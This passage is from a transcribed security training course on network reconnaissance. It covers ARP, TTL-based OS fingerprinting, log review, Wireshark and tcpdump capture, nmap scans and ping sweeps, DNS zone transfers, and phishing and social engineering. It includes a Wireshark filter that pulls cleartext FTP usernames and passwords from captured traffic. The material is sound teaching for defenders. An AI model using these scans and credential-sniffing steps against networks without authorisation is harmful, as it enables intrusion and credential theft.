Windows machine at the command prompt, I could type "arp -a" to list all ARP cache entries. What we're
seeing here are our different interfaces – so I've got three interfaces listed here. I can see the IP address for the
interface, I can see the IP addresses stored in the ARP cache in memory on this device, as well as the
corresponding physical MAC addresses.
Now, for a malicious user to do something terrible on a network, we said that part of what they have to do is
learn about what's there. And this is yet another way that an attacker could learn about things like IP addresses
and MAC addresses. Essentially, the more an attacker knows about our network and what things are called,
what their addresses are, what they are running, what ports things are listening on, the more well equipped they
are to start looking for vulnerabilities. Of course, attackers can conduct network scans if they can get on the
network in the first place. They could scan for open ports to get a sense of what types of network services are
out there. So, for example, if they get a response on a number of devices for TCP port 80, they know that those
are web servers. So they might then focus their energies on those devices to see what type of web servers and
if there are any known vulnerabilities and what version of the web server they are running and so on. Ping
sweeps can also be conducted to see what kind of a response we get on the network, so we know which
devices are out there. And, in some cases when you do a network scan, you might have to specify credentials.
Now this would be done by the good guys. If you are doing some kind of an audit or penetration test or if you
are just conducting a network scan of your own network, you might put in credentials that will allow you to
authenticate devices on the network and see what's running. Otherwise, the bad guys – essentially malicious
users is really what we mean – would be running noncredentialed scans. How hardened your
user accounts and passwords are will determine how successful they are with a noncredentialed network
scan. We'll be conducting network scans in various ways in different demonstrations in this class. You might
also have an import file that already contains network topology and device information that you import – so
you could see a network layout, it might be in CSV or XML format. Now this is great for the owners of the
network. But, if it falls into the wrong hands, it's a problem. Service discovery can be manual, where clients
are statically configured to discover various network servers, but the way things go these days is we normally
have a centralized service location server.
In this case, DNS could serve that role, where we've got service location (SRV) records that contain hostname
and port information. This is actually what gets used by Windows devices to find Active Directory
domain controllers.
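As a quick, hedged illustration (the domain name is a placeholder), you could query for that domain controller record yourself:
nslookup -type=SRV _ldap._tcp.dc._msdcs.example.com
# returns the hostnames and LDAP port of the domain controllers registered for that Active Directory domain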
There are centralized service registries where network services add themselves when they initialize, and clients can discover services by querying this centralized service registry. And, again, this is how
DNS service location records are really treated. A directory service, like Active Directory, can serve as a
service registry. So it's important that we secure this since it could be a central repository of services available
on the entire network. The last thing we'll mention here is operating system or OS fingerprinting. This allows
us to identify a remote operating system running on a device elsewhere over the network.
Now one way this can be done is by analyzing network packets sent from a particular OS, because each OS has its
own way of formulating certain types of packets – they put certain values in certain packet header fields. For
example, the TTL, or Time to Live, field is part of the IP packet header. Despite the name, in practice it behaves as a
hop count: it gets decremented by one for each router the packet goes through, and the packet is discarded when it
reaches zero. Different operating systems use different starting TTL values. For example, a Juniper device typically
uses a TTL of 64 for ICMP traffic. The Windows 7 operating system sets the TTL to 128 – that's the number of
routers the packet can go through before it gets discarded. Linux kernels such as 2.4 set the ICMP TTL to 255. [On
screen: Mac OS X uses a TTL of 64 for TCP.]
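As a quick, hedged illustration (the address is a placeholder), you can often make an educated guess just by looking at the TTL that comes back from a ping:
ping -c 1 192.168.1.200
# 64 bytes from 192.168.1.200: icmp_seq=1 ttl=128 time=0.41 ms
# a TTL near 128 suggests a Windows host; near 64 suggests Linux or macOS,
# minus one for each router hop between you and the target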
In this video, we discussed topology, service discovery, and OS fingerprinting.
Find out how to use logs to learn about the network environment.
Objectives
[Topic title: Reviewing Logs. The presenter is Dan Lachance.] In this video, I'll talk about the importance of
reviewing logs. Logs provide a wealth of information for IT technicians, especially for troubleshooting. But, at
the same time, logs can also provide a wealth of information for curious or malicious users. There are different
types of logs. The first is operating system logs, which will log both good events as well as warning or critical
types of events and, again, crucial for troubleshooting. In the same way, we can have application-specific logs.
We can have auditing logs to track activity for either regular users opening sensitive files or perhaps for other
administrators creating user accounts. Of course, there are also firewall logs where we can track activity or
sessions or even individual packets coming in through the firewall or those that were dropped because they
don't match a firewall rule that allows the traffic.
Individual log entries include many different things including date and time; the host related to that event,
which could be either an IP address or a hostname or perhaps both as well as username information if
applicable; an event ID, which is normally a numeric value that specifically ties to that type of event, so if it
occurs again, it gets the same event ID; and also of course, some kind of an event description. When it comes
to edge devices...and what we're really talking about here are things like VPN appliances, wireless access
points, routers, [Network switches] and so on. These types of devices and their logs should be kept separate. In
other words, those edge devices should forward those logs to a different secured host on some other secured
network because if the device is compromised, so are the logs.
Now, at the same time, this is separate from edge devices forwarding authentication requests to a central
RADIUS server. We're talking about log information being stored elsewhere. Now edge devices should not be
storing logs locally. Or, if they do, there should be another copy elsewhere. But they should also not be
performing authentication locally. And that's why forwarding authentication requests to a
centralized RADIUS server is very much a big deal. There is a high probability of edge device compromise.
And this is why we want to make sure logs and authentication are handled elsewhere because these edge
devices – not always, but in many cases – are public facing. They are reachable from the Internet.
In Linux and UNIX operating systems, we can use the older syslog daemon or the newer syslog-ng daemon, where ng
stands for next generation. The purpose of this daemon, or network service, is to handle logging on the local UNIX
or Linux host, but it can also forward specific log entries that you filter to another location, and it can receive
entries from other syslog or syslog-ng daemons. So we can specify the specific log sources we're interested in and
the specific events of that type that we want to send elsewhere. Windows can do the same thing. We can build event
subscriptions and then filter the events
that should be forwarded to other hosts. And it makes a lot of sense in a large network.
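As a minimal sketch of testing centralized logging from a Linux host (the collector hostname and port are placeholders), the logger command can write a test entry through the local syslog service or send one straight to a remote collector:
logger -p authpriv.warning "test entry written via the local syslog service"
logger -d -n loghost.example.com -P 514 "test entry sent over UDP to the central collector"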
Even if you're just dealing with desktop computers or Windows servers or Linux servers, instead of having to
review the logs on each and every device, it's nice to have a centralized location where
you have all the log entries that would be of relevance – for example, maybe only error or critical or warning
log entries on one host. And maybe, as you sip your morning coffee, that's where you go to check the latest log
entries. Here in Linux, [The following terminal window is open: root@Localhost:/var/log.] if we take a look at
the current working directory with pwd [Dan executes the following command: pwd. The following output is
displayed: /var/log.] – print working directory – we can see we're looking at /var/log. This is where most
Linux distributions store various types of log files. If I type ls to list the contents, I can see both files listed here
in black text as well as folders containing logs for certain items like cups – the Common UNIX Printing
System – and so on. So, for example, if I use the cat command to display the contents of the secure
log, [He executes the following command: cat secure.] I see information related to authentication and
passwords that succeeded and so on. At the same time, if I were to clear the screen and then use cat against the
main Linux system log, messages, [He executes the following command: cat messages.] I can see all of the
details related to the main operating system kernel that's been running and the messages that it reports. And, of
course, if I really want to, then I can go ahead and filter that log. So for example, I can type cat messages and I
can pipe that using vertical bar symbol, let's say, to grep and maybe we will do a case insensitive line matching
for vmware. [He executes the following command: cat messages | grep -i vmware.] And here I can see
VMware-specific related items in that log file.
Here, in Windows Server 2012 R2, we can fire up the Event Viewer. [The Event Viewer window is open. It is
divided into three sections. The first section is a navigation pane. In which Event Viewer (Local) node is
selected by default. It includes folders such as Custom Views and Windows Logs. The second section displays
the information on the basis of the selection made in the first section. The second section includes the
following subsections: Overview, Summary of Administrative Events, Recently Viewed Nodes, and Log
Summary. The third section is titled Actions which includes the Event Viewer (Local) expandable node.] And
from here, for instance, in the left navigator, I might expand Windows Logs and look at the main System log
file [In the navigation pane, he clicks the Windows Logs folder. On clicking it, several options appear, he
clicks the System option.] with all of its entries. So, once they pop up over here on the right, I'm going to see a
series of columns that I could also sort by. Maybe I want to sort my log entries chronologically or by the
Source or by the Event ID. [On selecting the System option, its content gets displayed in the second section.
The second section displays the number of events in a tabular format. The following are the column headers:
Level, Date and Time, Source, Event ID, and Task Category. On selecting any entry from the table, its
information gets displayed below the table. There are two tabs below the table: General and Details.] So, for
example, maybe what I'll do here is sort by the Level column. So all my informational messages are listed at
the top. If I click it again, then it would sort it again. And I could see all of my critical and warning items listed
at the top. We'll just scroll back up here and so on. So, as we scroll through the log, we can see the types of
information listed here. If I select on a specific log entry, so I will just double-click on it, it pops up the details
– shows me when it was logged, [He double-clicks an entry in the table. As a result, the following dialog box
opens: Event Properties - Event 7036, Service Control Manager.] the Event ID number, which I could search
up online, and so on.
Now, from a security perspective, [He closes the dialog box.] yes, all logs are important. But we might also be
especially interested in the Security log here [In the navigation pane, under the Windows Logs folder, he clicks
the Security option.] in Windows, where any audit events...if we are auditing logon attempts, whether they fail
or succeed or file access, we're going to see entries listed here for auditing. [He refers to the number of
auditing events which are displayed in the tabular format in the second section.] Of course, at the same time,
we can right-click on a log in the left-hand navigator and we could Filter Current Log. [In the navigation pane,
he right-clicks the Security option. As a result, a shortcut menu appears from which options can be selected.
He selects the Filter Current Log option.] So we could say, for instance, "I only want to see Critical errors. I
only want to look at certain Event sources or certain Event IDs". [The Filter Current Log dialog box opens. It
contains two tabs: Filter and XML. Under the Filter tab, there are several fields such as Logged, Event Level,
and Task Category.] So for example, I might look for Critical, Warning, or Error items here in Security log,
I'll just click OK. [In the Event level field, he checks the following checkboxes: Critical, Error, and Warning.
Then he clicks the OK button.] And, after a moment or two, it will filter it out. And any log entries that do
meet those conditions will be listed. So, of course, I could choose something here. [In the second section, for
the Security option, the Number of events are displayed in a tabular format after applying the Critical, Error,
and Warning levels.] And I could see the details by double-clicking and reading that log entry.
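If you prefer the command line, a roughly equivalent filtered query can be run with the built-in wevtutil tool. This is a hedged sketch; the event count is arbitrary:
wevtutil qe Security /q:"*[System[(Level=1 or Level=2 or Level=3)]]" /rd:true /c:10 /f:text
Level 1 is Critical, 2 is Error, and 3 is Warning; /rd:true lists the newest events first, /c:10 limits the output to ten events, and /f:text formats them for reading.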
Now, if I really wanted to configure log forwarding – in this case, in Windows – that's where I would go to my
event Subscriptions [In the navigation pane, he selects the Subscriptions folder. As a result, the Event Viewer
pop-up box appears in the second section.] where it tells me to start the Event Collector Service. And then,
from there, I could right-click and Create Subscription where we would do things [In the navigation pane, he
right-clicks the Subscriptions folder. As a result, a shortcut menu appears from which options can be selected.
He selects the Create Subscriptions option. Then, the Subscription Properties dialog box opens which includes
fields such as Subscription name, Description, and a drop-down list box named Destination log. It also
contains the following section: Subscription type and source computers. It contains the following radio
buttons: Collector initiated which is selected by default, and Source computer initiated. There is the Select
Computers button adjacent to the Collector initiated radio button.] like Select Computers I want to reach out
to and grab log information from. And then, of course, I could filter the events down here in the bottom right by
clicking Select Events. [He clicks the Select Events drop-down list box.]
Now, when I do that, I get to choose the event types [The Query Filter dialog box opens. It contains the Filter
and XML tabs. The Filter tab is selected by default. Under the Filter tab, there are several fields such as Event
level, Event logs, and Event sources.] – Critical, Warning, Error, Information, and so on. And I could further
filter it by event log types – maybe only certain logs I'm interested in – Event IDs, Keywords, and so on.
The last logging item to consider is log rotation so that as log files become full, new logs get created while we
retain a history of the older logs. So we can have different log rotation settings that apply to individual logs.
We can do it in Windows, we can do it in Linux and UNIX. Then there is log retention, which might be
required for regulatory compliance, but we also have to think about how much disk space will be used by
archived logs. This might be a case where we actually choose to archive something long term in the cloud. In
this video, we discussed how to review logs.
[Topic title: Packet Capturing. The presenter is Dan Lachance.] In this video, I'll talk about packet capturing.
Packet capturing can be used by either legitimate users or malicious users for a variety of reasons, including
the establishment of a network traffic baseline. So, by capturing a large enough amount of traffic, we can
establish what is normal in terms of network traffic patterns. We can also capture traffic and then use it to
troubleshoot network performance issues, such as if we have a jabbering network card that is sending out
excessive traffic or if we are getting a lot of network broadcasts that we don't think should be on the network,
we can check out the source. So we use packet capturing then to monitor network traffic. It can record traffic
and save it to a file for later analysis. And, in some cases, some packet capturing tools allow you to replace
contents within fields, within headers of the packet, or in the payload and then send it back out on the network
again. Now, when we're capturing network traffic, we're talking about capturing it whether it's on a wired
network or wireless.
There are numerous packet capturing tools available. Some are hardware-based where we can use rule-based
traffic classification. They also offer options such as the ability to send packets to a different interface and the
ability to drop packets that we aren't interested in. Now that could also be useful for mitigating things like denial-of-service
attacks. It might not be just that you are not interested in capturing or recording that traffic, but it's suspicious.
And you don't want to have any part of it. At the software level, there are numerous applications out there to
capture network traffic and to perform analysis. Wireshark is one. In UNIX and Linux environments, we can
also use the tcpdump command.
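As a brief, hedged sketch (the interface name is a placeholder), a tcpdump capture that records web traffic to a file for later analysis might look like this:
tcpdump -i eth0 -w webtraffic.pcap port 80
# captures traffic to or from TCP/UDP port 80 on interface eth0 and writes it to a capture file
# the saved .pcap file can then be opened in a tool like Wireshark for analysis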
Here in Wireshark, [The Wireshark Network Analyzer window opens. Running along the top of the window is
a menu bar. Below this, there is a toolbar.] if I click the leftmost icon in the toolbar, [The Wireshark: Capture
Interfaces window opens. A list of interfaces appears. Each interface has the following buttons adjacent to it:
Start, Options, and Details.] I can choose from the list of interfaces which one I want to capture network
traffic on. So I see, in my second interface here, I've got a number of packets going through that interface.
That's the one I want to capture traffic on. So I'll just go ahead [Dan refers to Microsoft interface which has
the following IP: 192.168.1.157. It contains 108 packets.] and click Start. And, when I do that, it starts
capturing the network traffic. I can see the Source where it came from, the Destination where the traffic is
going to, the Protocol, and additional Info.
Now, when I am happy with that, I can go ahead and I'll click the fourth button from the left in the toolbar to
stop the capture. And, as we stated, we could Save this for later analysis. [He clicks the Save option from the
File menu in the menu bar.] Now, if I select an individual packet in this listing, in the middle of the screen, I
can see the hardware frame – in this case, Ethernet II – where I can see the Source and Destination hardware or
MAC addresses that's Layer 2. Then I can see the IP header, the Internet Protocol header, where I see things
like the Time to live – the TTL. And, as I scroll further down, the Source and Destination IP addresses – those
are Layer 3 addresses.
Now let me just collapse the IP header. Then I see that this is a UDP transmission – User Datagram Protocol.
And again, I can see here the Source port and the Destination port. So again, that's Layer 4. And then I see
Data. Now the Data is the payload – the actual contents of the packet. Everything else that we've just looked
at is used to get the packet to where it's going and back. So, in the data, we have the payload. Essentially that
would map, generally speaking, to Layers 5, 6, and 7 in the OSI model depending exactly on what's happening.
So our frame here where we see our MAC addresses – Layer 2; the IP header – Layer 3; the UDP header –
Layer 4; and the payload or data in the packet – Layers 5, 6, and 7 of the OSI model.
So, when you are capturing network traffic, we have to understand the distinction between hubs and
switches. Because, in the hub environment, all the devices plugged into the hub can see all of the traffic
transmitted by all other devices plugged into that hub. Now, with an Ethernet switch, it's different. Two
communicating devices can see their own unicast transmissions to each other, but they don't see other unicast
transmissions for other stations on the same switch. They'll still see broadcasts and multicasts, but that's about it.
So, if you're using a network switch, which pretty much everybody would be, then you have to think carefully
about which physical port your device is plugged into if you want to capture network traffic. If your switch
supports it, you want to configure port mirroring so that network traffic on the other ports is copied to the port
where you are capturing. Otherwise, when you capture network traffic, you might only see traffic related to your
own station, again, other than broadcasts and multicasts. So the switch monitoring port is very important.
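If your switch is a Cisco model that supports SPAN, for example, the mirroring configuration might look roughly like the following sketch – the session number and interface names are placeholders, and the exact syntax varies by platform:
monitor session 1 source interface GigabitEthernet0/1
monitor session 1 destination interface GigabitEthernet0/24
! copies traffic seen on port Gi0/1 to port Gi0/24, where the capture station is plugged in;
! additional source ports or a port range can be added to the same session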
We should also consider the fact that if we are interested in capturing traffic going through a router, then
maybe that's where we would run our packet capturing tool. A multihomed device is one that's got at least two
network interfaces. So, if we've got a server acting as some kind of a firewall, then we might run our packet
capturing software there to capture traffic entering or leaving the network, same as a router. We have to watch
out for ARP cache poisoning. This is where a malicious user can update the MAC address in client ARP cache
tables in memory with a rogue MAC address – in other words, with their MAC address for their fake router.
Now that can be used for good to redirect people through a more efficient router or for evil where a malicious
user is really only interested in getting all the traffic funneled to one location so they can capture it all even in a
switched environment.
When you capture network traffic, you can configure a capture filter so that you are filtering what you are
capturing in the first place or you could capture everything that your machine can see on the network and then
you can configure a display filter to filter out what you are looking at. So for example, if you only want to see
SMTP mail traffic from a certain server, you can easily do that. So for example, here we see in our first
statement, we are filtering by an IP source address. [ip.src == 10.43.54.65] The second example here – we
can filter by a TCP port number equal to 25, which would be SMTP or we might look for ICMP
traffic. [tcp.port eq 25 or icmp] In the third example, we're taking a look at the first three portions of a
hardware MAC address to ensure they match what's been filtered for here. [eth.addr[0:3] == 00:06:5B] Now these
are filter statements that we might use in a tool such as
Wireshark. In this video, we discussed packet capturing.
[Topic title: Capture FTP and HTTP Traffic. The presenter is Dan Lachance.] One of the many tools available
for reconnaissance is a network analyzer, otherwise called a packet sniffer. Here, in my screen, I've
downloaded and installed and started the free Wireshark application. [The Wireshark Network Analyzer
window opens. Running along the top of the window is a menu bar. Below this, there is a toolbar.] Now, to
start a capture, I'm going to click the leftmost icon in the toolbar, which lists my interfaces on this machine.
The second of which has some packet activity. So I'm going to start capturing on that by clicking the Start
button. Now I'm going to remove any filtering information to make sure that we are capturing all network
traffic. I'm then going to connect to a web server at 192.168.1.162. [Dan enters the following in the address
bar of the web browser: 192.168.1.162. Then the Windows Server web page opens. It displays the Internet
Information Services section.] And, after a moment, we can see the web page pops up. And, in another web
browser tab, I'm going to use the ftp:// prefix in the address bar to connect to an FTP server running on that
same host.
Now the FTP server here requires authentication. [The Authentication Required dialog box opens. Dan enters
his login credentials.] So I'm going to go ahead and provide the credentials. And then it logs me in. And I can
see the index listing of files at the root of the FTP server. There are none because it's an empty FTP server, but
it did let us in. Let's go back and stop the Wireshark capture. And then let's take a look at both the HTTP and
the FTP traffic that we just captured. Here in Wireshark, I'm going to click the fourth icon from the left to stop
the packet capture. And I'm going to go ahead in the Filter line up there and type http. [In the Wireshark
window, below the toolbar, there is Filter search bar. He enters http in the Filter search bar.] So we only are
viewing HTTP packets. Now here I see a number of packets. Each line here is a packet.
When you select it in the middle of the screen, you can see the packet headers. [The window is divided into
three sections. The first section lists the number of packets in a tabular format with following column headers:
Time, Source, Destination, Protocol, and Info. The second section displays the packet headers. The third
section displays the hexadecimal and the ASCII representation of the packets.] And, at the very bottom in the
third panel at the bottom, you can see – on the left – a hexadecimal representation of the content or payload
of the packet and, on the right, an ASCII representation. But what we could do is modify our Filter. Let's
say we're going to add ip.dst==192.168.1.162, which we know is the IP address of our web server. [He enters
the following in the Filter search bar: http and ip.dst==192.168.1.162.] And here we happen to have one
captured transmission. And let's take a look at the headers – so having that packet selected. It's an HTTP
packet. We can see that in the Protocol column. In the Source column, we can see where it came from. That's
my local client address. And the Destination – in this case, the web server.
So the Ethernet II frame has Layer 2 addresses – in other words, MAC addresses. If we take a look at the
Internet Protocol or IP header, it's got a number of fields, but it does include the Source and Destination or
Layer 3 IP addresses. The Layer 4 header is the Transmission Control Protocol, TCP header, where we've got a
Source port. In this case, because this transmission is stemming from a client, it's a higher-numbered port, but it's
destined for port 80 because it is going to the web server. And finally of course, we are going to see some
more detail, in this case, for the Hypertext Transfer Protocol, which – depending on how you are connecting
and whether or not it's encrypted – would apply to Layers 5, 6, and 7 of the OSI model. So we can see down
below here...in the ASCII representation of the payload, we can see that we're using a Chrome browser. And
we can see that it's just basically requesting some icon files and so on from the web server.
Let's go up in the Filter line and type in ftp and examine that traffic. [He enters ftp in the Filter search bar.] So
I'm going to go ahead and press Enter. And, after a moment, it will filter it for FTP. We can see there is a
communication between the FTP server, which is also the web server's IP address, with my local station. [He
refers to the IP address 192.168.1.162 which is present under the Source column and to the IP address
192.168.1.157 which is present under the Destination column.] And, having an FTP packet selected, if we
kind of break down the headers like we did with HTTP, you'll find it's pretty similar. So we've got our Ethernet
frame with the Source and Destination MAC addresses. Again, that applies to Layer 2 of the OSI model. The
IP header applies to Layer 3; it's got various fields including the Time to live or TTL, which will vary from one
operating system to another.
Here with Windows, it starts at 128. And it gets decremented by one as it goes through each router along its
path. But we can also see in the IP header the Source and Destination IP address yet again. Just like we did
with HTTP and just like with HTTP again, we've got a Layer 4 TCP header – Transmission Control Protocol.
Of course, the port information is going to be different for FTP than it will be for a web server. And finally,
we've got the actual application header for File Transfer Protocol(FTP) here, which would apply again
depending on how it's used to Layers 5, 6, and 7 of the OSI model. So we can see any information related to
that.
Now what's interesting is that, even without delving down into the payload of the packet, just by looking at the
Info column up here in Wireshark on the right, I can see that it prompted me for a username – which was
specified as administrator – and it then asked for a password. And the password is in clear text here. There is no
challenge. If anyone can be on the network capturing traffic while you're using clear-text credential passing
systems like FTP, it's child's play to retrieve that information.
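In fact, a display filter can pull those credentials out of a large capture directly. This is a hedged sketch of the kind of filter you might type into the Filter line:
ftp.request.command == "USER" || ftp.request.command == "PASS"
This shows only the packets in which the FTP username and password were sent, both in clear text.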
Now, to protect FTP communications, you might use IPsec (IP Security); everything would be encrypted, FTP or not.
You might use a VPN tunnel through which you send your FTP traffic.
That would be safe. Or maybe you use a secure FTP solution, perhaps, using FTP over an SSH connection. But
FTP by itself is not considered safe. Now you can apply this kind of rule set that we've talked about in this
demonstration to capturing pretty much any type of network traffic to begin interpreting what you're looking
at. It's one thing to capture the traffic; the skill comes in being able to interpret what you are seeing. And, to do
that, you've got to understand the OSI model and the TCP/IP protocol suite, MAC addresses, IP addresses,
and so on. In this video, we learned how to capture and analyze FTP and HTTP traffic.
[Topic title: Network Infrastructure Discovery. The presenter is Dan Lachance.] In this video, I'll demonstrate
how to perform network discovery using Linux. Now there are plenty of tools for both Windows and Linux.
Some are command line based. We will be using the nmap command in Linux. But, in both Windows and
Linux, there are also graphical tools that can map your network for you. Some are free, some are not. [The
root@kali:~ window is open.] So let's start here in Linux by typing nmap. And then I'm going to pop in the IP
address of a specific host on the network. Now, given I am putting this host address in, it means I must already
know what exists and that it's up and running. But we will talk about what to do when you don't know that
already. So, when I press Enter, [Dan executes the following command: nmap 192.168.1.200.] what nmap is
going to do is start to show me, well first of all, whether or not that host is up and running. And we know that
host is up and running because it's showing us open ports on that host. Now here we see a number of TCP
ports that are open. And, if we take a look, we'll see ports 135/tcp, 139/tcp, 443/tcp, 445/tcp, 3389/tcp, which
is for remote desktop. This smells like a Windows machine, specifically a domain controller.
Now we can't be sure without further investigation, but that's what reconnaissance is about. It's about scanning
one or more hosts – in this case, an entire network or multiple networks – as a starting point, which serves as a
launchpad for further investigation for things that look interesting. Now this could be used legitimately so we
can identify any weaknesses on our network. Or it could be used by malicious users to pinpoint what they are
going to exploit or attempt to exploit. Let's clear the screen with a clear command. And let's run nmap again,
except this time I'm going to use the -O option, which allows me to do OS fingerprinting. And again, I'm
going to give it a single-host IP address. So I'm going to go ahead and press Enter. [He executes the following
command: nmap -O 192.168.1.200.] Now this may take a moment or two, but the idea is that it's going to take
a look at open ports and also at the type of responses it gets in terms of packets to try to guess at what type of
OS it is. And notice down below, it's telling me that it's probably Windows 7, Server 2012, or Windows 8.1. In
fact, that machine is running Windows Server 2012 R2.
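To dig a little deeper, a service and version scan is often the next step. The following is a minimal sketch against the same placeholder host:
nmap -sV 192.168.1.200
# probes each open port and reports the service name and version it detects,
# which helps pinpoint software with known vulnerabilities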
So again, this is part of reconnaissance. It is not only seeing what nodes are up on the network or what ports
are open, which services are running, but also what operating systems are running. It is all about information.
It really is power when it comes to gathering information. And that's really the first thing that happens when an
attacker starts doing their homework when they have chosen a victim. And, maybe in some cases, it helps them
choose a victim. Often, attackers will go for the lowest hanging fruit, it happens. So the next thing I'm going to
do is I'm going to clear the screen and then I'm going to run nmap. I'm going to do a ping sweep so I can see
which hosts are up and running on the network. To do that, I will use -sP. And then I'm going to tell it
192.168.1.0 – that's my network address – /24. That's the number of bits in the subnet mask expressed in CIDR
format. So basically, it's a ping sweep. [He executes the following command: nmap -sP 192.168.1.0/24.] And
what we want to happen is each host to respond with an ICMP Echo Reply.
Now, of course, if hosts are fully firewalled, then this is going to be an issue. We're not going to get much
back. But what I'm starting to see is a list of hosts that are up and running. I am seeing some details about
whether it's a VMware device or so on. And I'm also able to see the MAC address. So, down at the bottom, it
says nmap is done, 256 IP addresses. And, out of that, 11 hosts are up and running. Again, we know now
what's active on the network. And, from here, we might pick on some of them and do OS fingerprinting or get
a list of ports that are open on those devices. In this video, we learned how to perform network discovery in
Linux.
After completing this video, you will be able to explain harvesting techniques.
Objectives
[Topic title: E-mail and DNS Harvesting. The presenter is Dan Lachance.] In this video, I'll talk about email
and DNS harvesting. Both email and DNS harvesting are forms of reconnaissance. They can be either
manually invoked by perpetrators or automated, which is usually the case, through bots – some kind of automated
software that is often delivered through malware. Email and DNS harvesting is
illegal in some jurisdictions around the world because what we're doing is gathering sensitive information and
potentially using it in a way that the owner of that information did not consent to. Email harvesting is the
process of obtaining email addresses from websites and from various network services, such as an LDAP server
that might serve as a centralized contact list, from public forums that might list email addresses, like social media
sites, and also from malware that can read an infected user's contact lists. Now why would someone want to harvest
email addresses? Well, it could be used for bulk email lists to try to send unsolicited spam messages or trying
to sell a service or a product of some kind. That's one way it can be used.
Another is for phishing, spelled with a "ph" prefix, where we, essentially, get lots of people's email addresses
and send out some kind of a scam email, maybe with a file attachment, and trick the user into opening the
attachment, which infects their machine. Or maybe the phishing scam is used to trick the user into
clicking a link and providing sensitive information, like banking details. In this example, [The screenshot of an
e-mail message from Western Union Support Team is displayed on the screen.] I've got an email message that
was received about Western Union money transfers, which I never sent. Now, the idea is that this is a scam
where there's a file attachment. And, in the body of the message, I'm being instructed to detach the Western
Union file attachment so that I can reclaim the funds that I sent. When, in fact, I never did. So, it's always a
good idea to be somewhat suspicious and cynical when you get email messages that your gut instinct tells you
don't feel right. Because this is probably an email message that would infect my machine. Many websites these
days don't post email addresses and this is a good thing. Instead, if we need to send an email to someone
related to the website, we would fill in a form. And then that form is sent to the server where there's a server-
side script that sends the email.
So, the email address then is never exposed to the client web browser. DNS harvesting is the process of
obtaining DNS records. DNS is a name look up service where we normally do a query against the server,
giving it a name, such as www.google.com. And it returns the IP address. Well, private DNS servers hold
names and IP addresses which could reveal a lot about the internal network structure of a company. The zone
transfer is the transfer of records between different DNS servers. Now in some ways, that can be captured with
network capturing tools. At the same time, there are some command line tools built into operating systems,
like the old nslookup, the name server lookup command. Which can be used to query DNS or to conduct its
own transfer. Now that's not to say nslookup is a tool that's only used for bad purposes. It can also be used for
troubleshooting or just to test that DNS is functioning correctly. So, for example, here at the the Windows
command line. [The Command Prompt window is open.] I can type nslookup to start the nslookup tool in
interactive mode where I prompt the changes. [Dan executes the following command: nslookup. The following
output is displayed: Default Server: google-public-dns-a.google.com, Address: 8.8.8.8.] And if I wanted to, I
could simply type in something I want to query, like www.google.com and it will return the IP addresses for
that web server. Of course, what I could do is change the type of record I'm querying. For instance, I might
type set type=mx. That's a mail exchanger (MX) record. And then I might type whitehouse.gov, because I want to
see the SMTP mail hosts related to email addresses at whitehouse.gov. And, of course, I can see numerous hosts
listed down below.
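An attempted zone transfer from within nslookup's interactive mode might look like the following sketch; the server and domain names are placeholders, and a properly configured DNS server should refuse the request:
server ns1.example.com
ls -d example.com
The ls -d command asks the specified server for every record in the zone; if transfers aren't restricted, the full internal zone is dumped.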
The good news is that DNS servers can be configured to limit zone transfers to specific hosts. Also, firewalls can
block DNS queries from specific sources. Remember that DNS queries from clients come in on UDP port 53, while
zone transfers between DNS servers normally occur over TCP port 53. DNS harvesting is also often referred to as
DNS enumeration, because that's really what it's doing. In this video, we discussed email and DNS harvesting.
After completing this video, you will be able to recognize social engineering techniques.
Objectives
[Topic title: Social Engineering and Phishing. The presenter is Dan Lachance.] In this video, we'll discuss
social engineering and phishing. Social engineering is yet another form of reconnaissance as is phishing spelt
with a "ph" instead of an "f". And we're not talking about the relaxing type of phishing here. Social
engineering is really the equivalent of deceiving people. It's trickery. Phishing is a form of social engineering.
Now the goal of social engineering and phishing is to have victims divulge sensitive information. You're trying
to fool people to do that. So that sensitive information would include things like usernames, passwords, bank
account information, and so on. So the victim then believes in the legitimacy of the perpetrator. Perpetrators
then exploit people's fears often. So there might be some kind of a social engineering or phishing scam where
we pretend to be law enforcement tracking Internet activity. And so there is a pop-up that might display on the
user's screen. And, because people are afraid of imprisonment, if there is a message that says to send money to
a certain PO number or through Western Union Money Transfer, they may actually pay up, it happens.
Another way that perpetrators can exploit people's fears is through tax scams.
So there might be an e-mail phishing scam whereby we claim to be the government and that income taxes are
past due. And that to avoid penalties and higher interest charges on the outstanding balance, people need to pay
immediately using their credit card or by sending a money transfer. Again, playing on people's fears. So here is
an example of social engineering. We are in step one. A malicious user calls an unsuspecting victim, claiming
to be a telephone company technician that needs to come on-site to fix a problem. Now, of course, the
malicious user will have done their homework. They will have performed reconnaissance so they know who
the telephony provider is for this specific victim company they are targeting. And they might get to know the
name of the receptionist, know what kind of telephony services the company uses, and so on. Number two –
the victim would then set the appointment date and time. They would probably have no reason to believe that it
was a scam if things were done properly by the malicious user.
In step three – the malicious user shows up, dressed in the appropriate clothing, carrying the appropriate tools.
So they look like the real deal. In step four, the victim would then let the malicious user into, in this case, a
wiring closet or a server room to fix the – quote, unquote – problems with the telephone system. Now, in step
five, the malicious user has physical access to network infrastructure gear. That is a problem. In a phishing
example, in step one, a malicious user would send an e-mail message to a harvested e-mail address. Now, of
course, this would be automated, it would be sent to thousands of e-mail addresses that were harvested, in most
cases, probably illegally. The message would appear to come from a reputable bank, for instance, and the
message would ask the user to reset their password and provide a link to a site. And you know, even if the user
follows that link, it looks like their banking site – it looks legitimate. Really, it's a fake web site that looks like
the real thing that's under control of the malicious user. So then, in number two, the victim clicks the link and
enters sensitive banking information which, of course, is captured by the malicious web site.
So the malicious user's web site would then display a message to the user telling them that the bank is
experiencing technical difficulties – so, of course, it can't actually show them their accounts – and that the user
should try again later. Of course, when the user tries again later, it's too late. In this example, I've received an
e-mail message from what appears to be my bank. [The screenshot of an e-mail message is displayed.] But, if
we will look carefully at who it says it's from, at the top of this e-mail message, the e-mail address looks like
it's coming from some kind of an educational institution. And the message is telling me that someone tried to
access my bank account from a device on a certain date, from a certain IP address in Canada, and that it wasn't
successful. And so due to this, the bank has locked my account and everything is frozen, all my funds are
frozen. So to unfreeze them, all you have to do is click this link and then everything will be good.
Now this smells like a phishing scam and most certainly it is. So, even if this happens to be a bank you actually do
business with, do not click any links. You would need to actually go through the normal channels you would
do to sign in to ensure that nothing is wrong with your account. You know, it doesn't matter what type of
security controls you technically have in place – if people aren't aware of this type of scam, attackers can circumvent
most of your security controls and still wreak havoc on the network by infecting machines or divulging
sensitive information. So user awareness and training is absolutely number one. So what can we do about
social engineering and phishing issues?
Well, technically, there are a few mitigating controls – e-mail spam filters can help, for example – but the
administrative mitigation control level is where we really need to focus: as we've emphasized, user training and awareness. This
